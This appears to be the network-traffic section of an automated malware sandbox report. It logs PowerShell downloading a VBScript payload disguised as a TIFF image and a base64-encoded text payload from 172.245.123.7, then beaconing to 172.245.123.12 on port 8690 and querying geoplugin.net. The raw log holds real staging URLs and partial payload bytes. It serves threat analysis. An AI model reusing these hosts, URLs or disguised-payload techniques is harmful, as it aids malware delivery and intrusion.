                                                                                              Jan 14, 2025 06:13:23.373390913 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373405933 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373420000 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.373420954 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373439074 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373440027 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.373454094 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373470068 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373482943 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.373486042 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373501062 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373516083 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373518944 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.373523951 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373538017 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373553991 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373559952 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.373569965 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373579979 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.373619080 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.373645067 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373667002 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373683929 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373699903 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373716116 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373732090 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373739958 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.373739958 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.373749018 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373768091 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373794079 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.373815060 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.373845100 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373859882 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373872995 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373887062 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373902082 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373914003 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.373917103 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373931885 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373934031 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.373945951 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373963118 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373974085 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.373977900 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373994112 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.373996019 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.374007940 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.374013901 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.374023914 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.374066114 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.374375105 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.464072943 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464123964 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464159012 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464179993 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.464211941 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464267015 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464301109 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464323044 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.464335918 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464344025 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.464368105 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464401007 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464432955 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464454889 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.464466095 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464482069 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.464498997 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464531898 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464565039 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464595079 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.464600086 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464615107 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.464632988 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464664936 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464700937 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464714050 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.464735985 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464746952 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.464768887 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464802027 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464833021 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464848042 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.464865923 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464868069 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.464896917 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464930058 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464962006 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.464977980 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.464996099 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.465013027 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.465029001 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.465061903 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.465094090 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.465111017 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.465128899 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.465141058 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.515753031 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:23.591733932 CET8049740178.237.33.50192.168.2.4
                                                                                              Jan 14, 2025 06:13:23.595436096 CET4974080192.168.2.4178.237.33.50
                                                                                              Jan 14, 2025 06:13:24.656038046 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:24.661375999 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:24.661412954 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:24.661468029 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:24.661509037 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:24.661521912 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:24.661533117 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:24.661544085 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:24.661556959 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:24.661557913 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:24.661571026 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:24.661583900 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:24.661596060 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:24.666614056 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:24.666637897 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:24.666649103 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:24.666660070 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:24.666671038 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:24.666683912 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:24.666982889 CET869049741172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:24.667035103 CET497418690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:25.254122972 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:25.255382061 CET497398690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:25.260510921 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:55.316217899 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:13:55.317565918 CET497398690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:13:55.322979927 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:14:25.364146948 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:14:25.381203890 CET497398690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:14:25.386399031 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:14:55.417370081 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:14:55.418504953 CET497398690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:14:55.423500061 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:15:11.953836918 CET4974080192.168.2.4178.237.33.50
                                                                                              Jan 14, 2025 06:15:12.406440020 CET4974080192.168.2.4178.237.33.50
                                                                                              Jan 14, 2025 06:15:13.093931913 CET4974080192.168.2.4178.237.33.50
                                                                                              Jan 14, 2025 06:15:14.390832901 CET4974080192.168.2.4178.237.33.50
                                                                                              Jan 14, 2025 06:15:16.906526089 CET4974080192.168.2.4178.237.33.50
                                                                                              Jan 14, 2025 06:15:21.906640053 CET4974080192.168.2.4178.237.33.50
                                                                                              Jan 14, 2025 06:15:25.460155964 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:15:25.461797953 CET497398690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:15:25.466697931 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:15:31.593945026 CET4974080192.168.2.4178.237.33.50
                                                                                              Jan 14, 2025 06:15:55.491769075 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:15:55.492774963 CET497398690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:15:55.498290062 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:16:25.526017904 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:16:25.527997971 CET497398690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:16:25.532831907 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:16:55.551426888 CET869049739172.245.123.12192.168.2.4
                                                                                              Jan 14, 2025 06:16:55.553165913 CET497398690192.168.2.4172.245.123.12
                                                                                              Jan 14, 2025 06:16:55.558108091 CET869049739172.245.123.12192.168.2.4
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 14, 2025 06:13:05.126061916 CET5256553192.168.2.41.1.1.1
                                                                                              Jan 14, 2025 06:13:05.162748098 CET4963453192.168.2.41.1.1.1
                                                                                              Jan 14, 2025 06:13:21.972028971 CET5881653192.168.2.41.1.1.1
                                                                                              Jan 14, 2025 06:13:21.979295969 CET53588161.1.1.1192.168.2.4
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Jan 14, 2025 06:13:05.126061916 CET192.168.2.41.1.1.10x3f68Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                              Jan 14, 2025 06:13:05.162748098 CET192.168.2.41.1.1.10x7fa2Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                              Jan 14, 2025 06:13:21.972028971 CET192.168.2.41.1.1.10xfc52Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Jan 14, 2025 06:13:05.160339117 CET1.1.1.1192.168.2.40x3f68No error (0)res.cloudinary.comion.cloudinary.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Jan 14, 2025 06:13:05.170173883 CET1.1.1.1192.168.2.40x7fa2No error (0)res.cloudinary.comresc.cloudinary.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                              Jan 14, 2025 06:13:21.979295969 CET1.1.1.1192.168.2.40xfc52No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                              • 172.245.123.7
                                                                                              • geoplugin.net
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449730172.245.123.7807392C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Jan 14, 2025 06:12:59.969784021 CET326OUTGET /77/seethebestthingsforgetmebackwithgoodnewsthings.tIF HTTP/1.1
                                                                                              Accept: */*
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                              Host: 172.245.123.7
                                                                                              Connection: Keep-Alive
                                                                                              Jan 14, 2025 06:13:00.454273939 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Tue, 14 Jan 2025 05:13:00 GMT
                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                              Last-Modified: Mon, 13 Jan 2025 12:18:33 GMT
                                                                                              ETag: "39627-62b95716a9803"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 235047
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: image/tiff
                                                                                              Data Raw: 44 69 6d 20 73 68 20 27 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 20 6f 62 6a 65 63 74 0d 0a 44 69 6d 20 66 73 6f 20 27 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65 53 79 73 74 65 6d 4f 62 6a 65 63 74 0d 0a 44 69 6d 20 66 6f 72 6d 61 74 20 27 53 74 72 69 6e 67 46 6f 72 6d 61 74 74 65 72 20 6f 62 6a 65 63 74 0d 0a 44 69 6d 20 73 75 69 74 65 46 6f 6c 64 65 72 20 27 73 74 72 69 6e 67 3a 20 66 6f 6c 64 65 72 20 77 68 65 72 65 20 74 65 73 74 20 73 75 69 74 65 20 73 63 72 69 70 74 73 20 61 72 65 20 6c 6f 63 61 74 65 64 0d 0a 44 69 6d 20 70 72 6f 6a 65 63 74 46 6f 6c 64 65 72 20 27 73 74 72 69 6e 67 3a 20 72 6f 6f 74 20 66 6f 6c 64 65 72 20 66 6f 72 20 74 68 69 73 20 70 72 6f 6a 65 63 74 0d 0a 44 69 6d 20 73 75 69 74 65 46 69 6c 74 65 72 20 27 73 74 72 69 6e 67 3a 20 66 69 6c 65 6e 61 6d 65 20 66 69 6c 74 65 72 20 66 6f 72 20 73 65 6c 65 63 74 69 6e 67 20 69 6e 74 65 67 72 61 74 69 6f 6e 20 74 65 73 74 20 73 75 69 74 65 73 2e 0d 0a 44 69 6d 20 63 61 70 74 69 6f 6e 20 27 73 74 72 69 6e 67 3a 20 4d 73 67 42 6f 78 [TRUNCATED]
                                                                                              Data Ascii: Dim sh 'WScript.Shell objectDim fso 'Scripting.FileSystemObjectDim format 'StringFormatter objectDim suiteFolder 'string: folder where test suite scripts are locatedDim projectFolder 'string: root folder for this projectDim suiteFilter 'string: filename filter for selecting integration test suites.Dim caption 'string: MsgBox/PopUp title bar text.Dim aDocGens 'array of strings: filespecs for code-comment-based documentation generators.Dim aGits 'array of strings: common filespecs for Git bash and Git GUI executables.Dim aDocs 'array of strings: filespecs for last-minute docs to update before a push.Dim nextItem 'integer: current index of the prepItems array.Dim settings 'integer: controls MsgBox/PopUp behaviour.Dim prepItems 'array: list of prcedure (Sub) names to be called by window.SetTimeout.Dim flagFile 'string: filename of a temp file used by Setup.vbs.Dim versionLink 'web pag
                                                                                              Jan 14, 2025 06:13:00.454296112 CET224INData Raw: 65 20 77 69 74 68 20 76 65 72 73 69 6f 6e 20 69 6e 66 6f 0d 0a 44 69 6d 20 65 64 69 74 6f 72 20 27 64 6f 63 75 6d 65 6e 74 20 65 64 69 74 6f 72 0d 0a 44 69 6d 20 70 6f 77 65 72 73 68 65 6c 6c 20 27 66 69 6c 65 73 70 65 63 20 6f 66 20 61 20 70 77
                                                                                              Data Ascii: e with version infoDim editor 'document editorDim powershell 'filespec of a pwsh.exe, if available; or just "powershell"Const CreateNew = True 'for the OpenTextFile method.Const Enter = 13 'window.event.keyCode for t
                                                                                              Jan 14, 2025 06:13:00.454313040 CET1236INData Raw: 68 65 20 45 6e 74 65 72 20 6b 65 79 0d 0a 43 6f 6e 73 74 20 45 73 63 20 3d 20 32 37 20 27 77 69 6e 64 6f 77 2e 65 76 65 6e 74 2e 6b 65 79 43 6f 64 65 20 66 6f 72 20 74 68 65 20 45 73 63 20 6b 65 79 0d 0a 43 6f 6e 73 74 20 73 79 6e 63 68 72 6f 6e
                                                                                              Data Ascii: he Enter keyConst Esc = 27 'window.event.keyCode for the Esc keyConst synchronous = True 'for the Run methodConst hidden = 0 'for the Run methodConst VBScript = "VBScript" 'for the SetTimeout methodConst uninstallKey = "HKLM\Software
                                                                                              Jan 14, 2025 06:13:00.454329014 CET1236INData Raw: 72 6f 67 72 61 6d 73 5c 47 69 74 5c 63 6d 64 5c 67 69 74 2d 67 75 69 2e 65 78 65 20 7c 20 25 4c 6f 63 61 6c 41 70 70 44 61 74 61 25 5c 50 72 6f 67 72 61 6d 73 5c 47 69 74 5c 67 69 74 2d 62 61 73 68 2e 65 78 65 22 0d 0a 20 20 20 20 64 65 66 61 75
                                                                                              Data Ascii: rograms\Git\cmd\git-gui.exe | %LocalAppData%\Programs\Git\git-bash.exe" defaultDocs = "ChangeLog.md | ProjectInfo.vbs" defaultEditor = "notepad" With New Configurer powershell = .PowerShell If .Exists( "sui
                                                                                              Jan 14, 2025 06:13:00.454344988 CET1236INData Raw: 6e 69 6e 73 74 61 6c 6c 22 20 5f 0d 0a 20 20 20 20 20 20 20 20 2c 20 22 53 74 6f 70 53 63 72 69 70 74 73 22 20 5f 0d 0a 20 20 20 20 20 20 20 20 2c 20 22 52 75 6e 53 65 74 75 70 22 20 5f 0d 0a 20 20 20 20 20 20 20 20 2c 20 22 52 75 6e 54 65 73 74
                                                                                              Data Ascii: ninstall" _ , "StopScripts" _ , "RunSetup" _ , "RunTestSuites" _ , "GenerateDocs" _ , "OpenProgramsAndFeatures" _ , "OpenGit" _ ) flagFile = "Setup.bat" caption = document.
                                                                                              Jan 14, 2025 06:13:00.454363108 CET672INData Raw: 6e 73 65 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 41 77 61 69 74 4e 65 78 74 49 74 65 6d 0d 0a 20 20 20 20 20 20 20 20 45 78 69 74 20 53 75 62 0d 0a 20 20 20 20 45 6e 64 20 49 66 0d 0a 20 20 20 20 46 6f 72 20 45 61 63 68 20 64 6f 63 20 49 6e
                                                                                              Data Ascii: nse Then AwaitNextItem Exit Sub End If For Each doc In aDocs If reqConfirmChkBox.checked Then response = MsgBox( "Edit " & doc & "?", settings, caption ) Else response = vbYes
                                                                                              Jan 14, 2025 06:13:00.454377890 CET1236INData Raw: 74 49 74 65 6d 0d 0a 20 20 20 20 20 20 20 20 45 78 69 74 20 53 75 62 0d 0a 20 20 20 20 45 6e 64 20 49 66 0d 0a 20 20 20 20 49 66 20 72 65 71 43 6f 6e 66 69 72 6d 43 68 6b 42 6f 78 2e 63 68 65 63 6b 65 64 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20
                                                                                              Data Ascii: tItem Exit Sub End If If reqConfirmChkBox.checked Then response = MsgBox("Uninstall the VBScripting components and libraries, etc.?", settings, caption) Else response = vbYes End If If vbYes = respons
                                                                                              Jan 14, 2025 06:13:00.454395056 CET224INData Raw: 6e 69 6e 73 74 61 6c 6c 4b 65 79 20 5f 0d 0a 20 20 20 20 29 29 0d 0a 20 20 20 20 49 66 20 4e 6f 74 20 72 65 71 43 6f 6e 66 69 72 6d 43 68 6b 42 6f 78 2e 63 68 65 63 6b 65 64 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 55 6e 69 6e 73 74 61 6c 6c
                                                                                              Data Ascii: ninstallKey _ )) If Not reqConfirmChkBox.checked Then UninstallFromProgramsAndFeatures = False Exit Function End If On Error Resume Next sh.Run sh.RegRead(key) If Err T
                                                                                              Jan 14, 2025 06:13:00.454410076 CET1236INData Raw: 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 55 6e 69 6e 73 74 61 6c 6c 46 72 6f 6d 50 72 6f 67 72 61 6d 73 41 6e 64 46 65 61 74 75 72 65 73 20 3d 20 46 61 6c 73 65 0d 0a 20 20 20 20 20 20 20 20 45 6c 73 65 20 55 6e 69 6e 73 74 61 6c 6c 46
                                                                                              Data Ascii: hen UninstallFromProgramsAndFeatures = False Else UninstallFromProgramsAndFeatures = True End If On Error Goto 0End FunctionSub CreateFlagFile If Not fso.FileExists(flagFile) Then On Error
                                                                                              Jan 14, 2025 06:13:00.454427004 CET224INData Raw: 6d 20 69 64 2c 20 49 44 73 0d 0a 20 20 20 20 57 69 74 68 20 4e 65 77 20 57 4d 49 55 74 69 6c 69 74 79 0d 0a 20 20 20 20 20 20 20 20 49 44 73 20 3d 20 2e 47 65 74 50 72 6f 63 65 73 73 49 44 73 42 79 4e 61 6d 65 28 70 72 6f 63 65 73 73 4e 61 6d 65
                                                                                              Data Ascii: m id, IDs With New WMIUtility IDs = .GetProcessIDsByName(processName) For Each id In IDs .TerminateProcessById(id) Next End WithEnd SubSub RunSetup Dim response
                                                                                              Jan 14, 2025 06:13:00.459372997 CET1236INData Raw: 20 20 20 49 66 20 4e 6f 74 20 72 75 6e 53 65 74 75 70 43 68 6b 42 6f 78 2e 63 68 65 63 6b 65 64 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 41 77 61 69 74 4e 65 78 74 49 74 65 6d 0d 0a 20 20 20 20 20 20 20 20 45 78 69 74 20 53 75 62 0d 0a 20 20
                                                                                              Data Ascii: If Not runSetupChkBox.checked Then AwaitNextItem Exit Sub End If If reqConfirmChkBox.checked Then response = MsgBox("Run Setup?", settings, caption) Else response = vbYes End If If vbYes =


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.449738172.245.123.7807652C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Jan 14, 2025 06:13:19.769376040 CET112OUTGET /77/kissingbestthingswithgreatdayscomingforhim.txt HTTP/1.1
                                                                                              Host: 172.245.123.7
                                                                                              Connection: Keep-Alive
                                                                                              Jan 14, 2025 06:13:20.239456892 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Tue, 14 Jan 2025 05:13:20 GMT
                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                              Last-Modified: Mon, 13 Jan 2025 12:17:30 GMT
                                                                                              ETag: "a0aac-62b956dada718"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 658092
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/plain
                                                                                              Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44 6f 7a 51 7a 4d 77 49 44 70 79 41 71 4d 45 4b 44 67 79 77 6e 4d 77 4a 44 57 79 67 6b 4d 34 49 44 4b 79 67 52 4d 6f 48 44 32 78 51 64 4d 51 48 44 7a 78 67 63 4d 45 48 44 77 78 77 62 4d 34 47 44 72 78 67 61 4d 6b 47 44 6f 78 77 5a 4d 59 47 44 6c 78 41 5a 4d 4d 47 44 69 78 67 57 4d 6b 46 44 59 41 41 41 41 51 43 77 42 51 41 41 41 41 41 44 4c 77 67 42 4d 51 41 [TRUNCATED]
